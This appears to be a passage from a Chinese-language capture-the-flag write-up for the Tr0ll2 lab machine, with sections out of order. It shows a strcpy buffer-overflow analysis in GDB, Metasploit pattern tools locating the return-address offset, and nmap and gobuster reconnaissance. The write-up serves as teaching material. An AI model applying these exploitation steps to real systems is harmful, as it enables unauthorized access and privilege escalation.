<\/div><\/p>\n\u5148\u8fdc\u7a0b\u6d45\u6d45\u5206\u6790\u4e00\u4e0b\u5427\uff0c\u5b9e\u5728\u4e0d\u884c\u7b49\u4e0b\u518d\u62ff\u5230\u672c\u5730\u6765\uff1a<\/p>\n
\u5148\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
noob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ .\/r00t\n\n2 MINUTE HARD MODE LOL\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ cd ..\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely$ cd door2\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ .\/r00t\nUsage: .\/r00t input\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ cd ..\/door3;.\/r00t\nGood job, stand by, executing root shell...\nBUHAHAHA NOOB!\nwhoanoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ whoa\nBroadcast message from noob@Tr0ll2\n (\/dev\/pts\/0) at 4:42 ...\n\nThe system is going down for reboot NOW!\n<\/code><\/pre>\n\u5636\uff0c\u597d\u50cf\u4e00\u8fd0\u884c\u5c31\u4f1a\u5d29\u6389\uff0c\u5206\u6790\u4e00\u4e0b<\/p>\n
strings r00t\n# -bash: \/usr\/bin\/strings: Permission denied\nreadelf -h r00t \/nothing_to_see_here\/choose_wisely\/door2\/r00t\n# readelf: Error: 'r00t': No such file\n# File: \/nothing_to_see_here\/choose_wisely\/door2\/r00t\n# ELF Header:\n# Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 \n# Class: ELF32\n# Data: 2's complement, little endian\n# Version: 1 (current)\n# OS\/ABI: UNIX - System V\n# ABI Version: 0\n# Type: EXEC (Executable file)\n# Machine: Intel 80386\n# Version: 0x1\n# Entry point address: 0x80483b0\n# Start of program headers: 52 (bytes into file)\n# Start of section headers: 4424 (bytes into file)\n# Flags: 0x0\n# Size of this header: 52 (bytes)\n# Size of program headers: 32 (bytes)\n# Number of program headers: 9\n# Size of section headers: 40 (bytes)\n# Number of section headers: 30\n# Section header string table index: 27\nxxd r00t\n# 0000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 .ELF............\n# 0000010: 0200 0300 0100 0000 b083 0408 3400 0000 ............4...\n# 0000020: 4811 0000 0000 0000 3400 2000 0900 2800 H.......4. ...(.\n# 0000030: 1e00 1b00 0600 0000 3400 0000 3480 0408 ........4...4...\n# 0000040: 3480 0408 2001 0000 2001 0000 0500 0000 4... ... .......\n# 0000050: 0400 0000 0300 0000 5401 0000 5481 0408 ........T...T...\n# 0000060: 5481 0408 1300 0000 1300 0000 0400 0000 T...............\n# 0000070: 0100 0000 0100 0000 0000 0000 0080 0408 ................\n# 0000080: 0080 0408 d006 0000 d006 0000 0500 0000 ................\n# 0000090: 0010 0000 0100 0000 140f 0000 149f 0408 ................\n# 00000a0: 149f 0408 0c01 0000 1401 0000 0600 0000 ................\n# 00000b0: 0010 0000 0200 0000 280f 0000 289f 0408 ........(...(...\n# 00000c0: 289f 0408 c800 0000 c800 0000 0600 0000 (...............\n# 00000d0: 0400 0000 0400 0000 6801 0000 6881 0408 ........h...h...\n# 00000e0: 6881 0408 4400 0000 4400 0000 0400 0000 h...D...D.......\n# 00000f0: 0400 0000 50e5 7464 d805 0000 d885 0408 ....P.td........\n..........\n# \u6709\u4e09\u4e2a\u95e8\u90fd\u6709\u8fd9\u4e2ar00t,\u9010\u4e00\u5206\u6790\u5427\ngdb .\/r00t\n# GNU gdb (Ubuntu\/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04\n# Copyright (C) 2012 Free Software Foundation, Inc.\n# License GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\n# This is free software: you are free to change and redistribute it.\n# There is NO WARRANTY, to the extent permitted by law. Type "show copying"\n# and "show warranty" for details.\n# This GDB was configured as "i686-linux-gnu".\n# For bug reporting instructions, please see:\n# <http:\/\/bugs.launchpad.net\/gdb-linaro\/>...\n# Reading symbols from \/nothing_to_see_here\/choose_wisely\/door1\/r00t...done.\n(gdb) disassemble main\n# Dump of assembler code for function main:\n# 0x08048444 <+0>: push %ebp\n# 0x08048445 <+1>: mov %esp,%ebp\n# 0x08048447 <+3>: and $0xfffffff0,%esp\n# 0x0804844a <+6>: sub $0x110,%esp\n# 0x08048450 <+12>: cmpl $0x1,0x8(%ebp)\n# 0x08048454 <+16>: jne 0x8048478 <main+52>\n# 0x08048456 <+18>: mov 0xc(%ebp),%eax\n# 0x08048459 <+21>: mov (%eax),%edx\n# 0x0804845b <+23>: mov $0x8048580,%eax\n# 0x08048460 <+28>: mov %edx,0x4(%esp)\n# 0x08048464 <+32>: mov %eax,(%esp)\n# 0x08048467 <+35>: call 0x8048340 <printf@plt>\n# 0x0804846c <+40>: movl $0x0,(%esp)\n# 0x08048473 <+47>: call 0x8048370 <exit@plt>\n# 0x08048478 <+52>: mov 0xc(%ebp),%eax\n# 0x0804847b <+55>: add $0x4,%eax\n# 0x0804847e <+58>: mov (%eax),%eax\n# 0x08048480 <+60>: mov %eax,0x4(%esp)\n# 0x08048484 <+64>: lea 0x10(%esp),%eax\n# 0x08048488 <+68>: mov %eax,(%esp)\n# 0x0804848b <+71>: call 0x8048350 <strcpy@plt>\n# 0x08048490 <+76>: mov $0x8048591,%eax\n# 0x08048495 <+81>: lea 0x10(%esp),%edx\n# 0x08048499 <+85>: mov %edx,0x4(%esp)\n# 0x0804849d <+89>: mov %eax,(%esp)\n# 0x080484a0 <+92>: call 0x8048340 <printf@plt>\n# 0x080484a5 <+97>: leave \n# 0x080484a6 <+98>: ret \n# End of assembler dump.<\/code><\/pre>\n\u53d1\u73b0\u4e86\u4e00\u4e2astrcpy<\/code>\u51fd\u6570\uff0c\u4e0d\u77e5\u9053\u9614\u6b65\u9614\u4ee5\u8fdb\u884c\u5229\u7528\u3002<\/p>\n\u5148\u6253\u4e00\u4e2a\u957f\u70b9\u7684\u5b57\u7b26\u4e32\u770b\u770b\u6709\u6ca1\u6709\u53cd\u5e94\uff1a<\/p>\n
.\/r00t $(python -c 'print "A" * 1000')<\/code><\/pre>\n<\/div><\/p>\n\u795e\u5947\uff0c\u5ffd\u9690\u5ffd\u73b0\u7684\uff0c\u53c8\u51fa\u73b0\u4e86\uff0c\u4f46\u662f\u597d\u50cf\u6ca1\u6709\u6ea2\u51fa\u6b38\uff0c\u6211\u64e6\u641e\u9519\u4e86\uff0c\u91cd\u6765:<\/p>\n
<\/div><\/p>\n\u4e00\u8fd0\u884c\u5c31\u4f1a\u6539\u6743\u9650\u6216\u8005\u8e22\u51fa\u53bb\uff1f\u884c\uff08xieng\uff09\u6bcf\u6b21\u91cd\u65b0\u542f\u52a8\u65f6\u90fd\u4f1a\u66f4\u6539\u5f7c\u6b64\u7684\u884c\u4e3a\u662f\u5427\uff01<\/p>\n
\n\u6ce8\u610f\uff1a<\/strong> r00t \u7a0b\u5e8f\u7ecf\u5e38\u66f4\u6539\u5176\u95e8\u76ee\u5f55\uff0c\u9700\u8981\u8bb0\u4f4f\u3002\u8fd8\u6709\u4e00\u4e2a\u201cHARD MODE\u201d\uff0c\u53ef\u4ee5\u963b\u6b62\u5728 2 \u5206\u949f\u5185\u4f7f\u7528\u201cls\u201d\u3002\u53e6\u5916\uff0c\u8bb0\u4f4f\u662f\u5426\u770b\u5230\u6d88\u606f\u201cGood job, stand by, executing root shell\u2026.\u201d\u3002\u8fd9\u662f\u4e00\u4e2a\u9677\u9631\uff0c\u8fde\u63a5\u5c06\u88ab\u5173\u95ed\uff0c\u9700\u8981\u7acb\u5373\u4f7f\u7528\u201cCtrl + c\u201d\u7ec8\u6b62\u7a0b\u5e8f\u5e76\u5c06\u76ee\u5f55\u66f4\u6539\u4e3a\u4efb\u4f55\u5176\u4ed6door\u3002<\/p>\n<\/blockquote>\n<\/div><\/p>\n\u8c22\u7279\uff01<\/p>\n
\u518d\u6765\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u6765\u786e\u5b9e\u662f\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u7684\u6f0f\u6d1e\u7684\u3002<\/p>\n
\u8fd9\u6837\u7684\u8bdd\u521a\u521a\u5206\u6790\u9519\u4e86\uff1f\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7684\u6c47\u7f16\u4ee3\u7801\uff1a<\/p>\n
noob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ gdb -q r00t\n# Reading symbols from \/nothing_to_see_here\/choose_wisely\/door3\/r00t...done.\n(gdb) disassemble main\n# Dump of assembler code for function main:\n# 0x08048444 <+0>: push %ebp\n# 0x08048445 <+1>: mov %esp,%ebp\n# 0x08048447 <+3>: and $0xfffffff0,%esp\n# 0x0804844a <+6>: sub $0x110,%esp\n# 0x08048450 <+12>: cmpl $0x1,0x8(%ebp)\n# 0x08048454 <+16>: jne 0x8048478 <main+52>\n# 0x08048456 <+18>: mov 0xc(%ebp),%eax\n# 0x08048459 <+21>: mov (%eax),%edx\n# 0x0804845b <+23>: mov $0x8048580,%eax\n# 0x08048460 <+28>: mov %edx,0x4(%esp)\n# 0x08048464 <+32>: mov %eax,(%esp)\n# 0x08048467 <+35>: call 0x8048340 <printf@plt>\n# 0x0804846c <+40>: movl $0x0,(%esp)\n# 0x08048473 <+47>: call 0x8048370 <exit@plt>\n# 0x08048478 <+52>: mov 0xc(%ebp),%eax\n# 0x0804847b <+55>: add $0x4,%eax\n# 0x0804847e <+58>: mov (%eax),%eax\n# 0x08048480 <+60>: mov %eax,0x4(%esp)\n# 0x08048484 <+64>: lea 0x10(%esp),%eax\n# 0x08048488 <+68>: mov %eax,(%esp)\n# 0x0804848b <+71>: call 0x8048350 <strcpy@plt>\n# 0x08048490 <+76>: mov $0x8048591,%eax\n# 0x08048495 <+81>: lea 0x10(%esp),%edx\n# 0x08048499 <+85>: mov %edx,0x4(%esp)\n# 0x0804849d <+89>: mov %eax,(%esp)\n# 0x080484a0 <+92>: call 0x8048340 <printf@plt>\n# 0x080484a5 <+97>: leave \n# 0x080484a6 <+98>: ret \n# End of assembler dump.<\/code><\/pre>\nok\uff0c\u8fd8\u662f\u6709\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4e86\u5229\u7528\uff01\uff01\uff01<\/p>\n
\u67e5\u770b\u504f\u79fb\u91cf<\/h4>\n
\u5148\u786e\u5b9a\u4e00\u4e0b\u504f\u79fb\u91cf\uff0c\u4f7f\u7528metasploit<\/code>\u7684\u5de5\u5177\u786e\u5b9a\u4e00\u4e0b\uff1a<\/p>\n# kali\nlocate pattern_create.rb\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 1000\n#Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B<\/code><\/pre>\n# Tr0ll\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ gdb -q r00t\n# gdb: warning: error finding working directory: No such file or directory\n# r00t: No such file or directory.\n(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n# Starting program: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n# No executable file specified.\n# Use the "file" or "exec-file" command.\n(gdb) ^Z\n# [2]+ Stopped gdb -q r00t\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ .\/r00t\n# -bash: .\/r00t: No such file or directory\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door3$ cd ..\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely$ cd door2\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ .\/r00t\n# Good job, stand by, executing root shell...\n# ^C\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door2$ cd ..\/\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely$ cd door1\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ .\/r00t\n# Usage: .\/r00t input\nnoob@Tr0ll2:\/nothing_to_see_here\/choose_wisely\/door1$ gdb -q r00t\n# Reading symbols from \/nothing_to_see_here\/choose_wisely\/door1\/r00t...done.\n(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n# Starting program: \/nothing_to_see_here\/choose_wisely\/door1\/r00t Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B\n\n# Program received signal SIGSEGV, Segmentation fault.\n# 0x6a413969 in ?? ()<\/code><\/pre>\n\u786e\u5b9a\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a<\/p>\n
# kali\nlocate pattern_offset\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 6a413969\n# [*] Exact match at offset 268<\/code><\/pre>\nok\uff0c\u8ba9\u6211\u4eec\u770b\u4e00\u4e0bALSR<\/code>\u5f00\u6ca1\u5f00\uff08\u6c42\u6c42\u4e86\uff01\uff01\uff01\uff09<\/p>\n\nASLR\uff08Address Space Layout Randomization\uff09\u662f\u4e00\u79cd\u8ba1\u7b97\u673a\u5b89\u5168\u6280\u672f\uff0c\u65e8\u5728\u589e\u52a0\u7cfb\u7edf\u7684\u5b89\u5168\u6027\uff0c\u7279\u522b\u662f\u5728\u9762\u5bf9\u7f13\u51b2\u533a\u6ea2\u51fa\u7b49\u653b\u51fb\u65f6\u3002\u5b83\u901a\u8fc7\u5728\u6bcf\u6b21\u7cfb\u7edf\u542f\u52a8\u65f6\u968f\u673a\u5316\u53ef\u6267\u884c\u6587\u4ef6\u7684\u5185\u5b58\u5e03\u5c40\uff0c\u4ee5\u53ca\u52a8\u6001\u94fe\u63a5\u5e93\u3001\u5806\u3001\u6808\u548c\u5185\u5b58\u6620\u5c04\u7b49\u533a\u57df\u7684\u5730\u5740\uff0c\u4ece\u800c\u589e\u52a0\u653b\u51fb\u8005\u5728\u5229\u7528\u7cfb\u7edf\u6f0f\u6d1e\u65f6\u7684\u96be\u5ea6\u3002<\/p>\n
\u5177\u4f53\u6765\u8bf4\uff0cASLR\u7684\u5b9e\u73b0\u4f1a\u5c06\u53ef\u6267\u884c\u6587\u4ef6\u3001\u5171\u4eab\u5e93\u3001\u5806\u3001\u6808\u7b49\u5728\u5185\u5b58\u4e2d\u7684\u5e03\u5c40\u968f\u673a\u5316\uff0c\u4f7f\u5f97\u653b\u51fb\u8005\u96be\u4ee5\u51c6\u786e\u9884\u6d4b\u5185\u5b58\u5730\u5740\uff0c\u4ece\u800c\u96be\u4ee5\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u3002\u8fd9\u610f\u5473\u7740\u5373\u4f7f\u653b\u51fb\u8005\u53d1\u73b0\u4e86\u6f0f\u6d1e\uff0c\u4e5f\u5f88\u96be\u7f16\u5199\u6709\u6548\u7684\u653b\u51fb\u4ee3\u7801\uff0c\u56e0\u4e3a\u5b83\u65e0\u6cd5\u51c6\u786e\u5730\u77e5\u9053\u8981\u653b\u51fb\u7684\u5185\u5b58\u5730\u5740\u3002<\/p>\n
nmap -sV -sT -T4 -p- 10.161.61.134<\/code><\/pre>\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-15 04:51 EDT\nNmap scan report for 10.161.61.134\nHost is up (0.015s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT STATE SERVICE VERSION\n21\/tcp open ftp vsftpd 2.0.8 or later\n22\/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)\n80\/tcp open http Apache httpd 2.2.22 ((Ubuntu))\nService Info: Host: Tr0ll; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 24.33 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u5f00\u542f\u4e8680<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u626b\u63cf\uff0c\u9996\u5148\u5148\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u679c\u7136\uff0c\u53c8\u6765\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n
gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.161.61.134 -f -t 200<\/code><\/pre>\n\/icons\/ (Status: 403) [Size: 287]\n\/cgi-bin\/ (Status: 403) [Size: 289]\n\/doc\/ (Status: 403) [Size: 285]\n\/server-status\/ (Status: 403) [Size: 295]<\/code><\/pre>\n\u8fd9\u626b\u7684\u5565\u73a9\u610f\uff0c\u91cd\u65b0\u6539\u4e00\u4e0b\uff1a<\/p>\n
gobuster dir -w \/usr\/share\/wordlists\/dirb\/common.txt -u http:\/\/10.161.61.134 <\/code><\/pre>\n\/.hta (Status: 403) [Size: 285]\n\/.htpasswd (Status: 403) [Size: 290]\n\/.htaccess (Status: 403) [Size: 290]\n\/cgi-bin\/ (Status: 403) [Size: 289]\n\/index (Status: 200) [Size: 110]\n\/index.html (Status: 200) [Size: 110]\n\/robots.txt (Status: 200) [Size: 346]\n\/robots (Status: 200) [Size: 346]\n\/server-status (Status: 403) [Size: 294]<\/code><\/pre>\n\u7b49\u7684\u65f6\u5019\u624b\u5de5\u63a2\u6d4b\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/10.161.61.134\/robots.txt\nUser-agent:*\nDisallow:\n\/noob\n\/nope\n\/try_harder\n\/keep_trying\n\/isnt_this_annoying\n\/nothing_here\n\/404\n\/LOL_at_the_last_one\n\/trolling_is_fun\n\/zomg_is_this_it\n\/you_found_me\n\/I_know_this_sucks\n\/You_could_give_up\n\/dont_bother\n\/will_it_ever_end\n\/I_hope_you_scripted_this\n\/ok_this_is_it\n\/stop_whining\n\/why_are_you_still_looking\n\/just_quit\n\/seriously_stop<\/code><\/pre>\n\u5c1d\u8bd5\u770b\u4e00\u4e0b\u8fd9\u4e9b\u76ee\u5f55\uff1a<\/p>\n
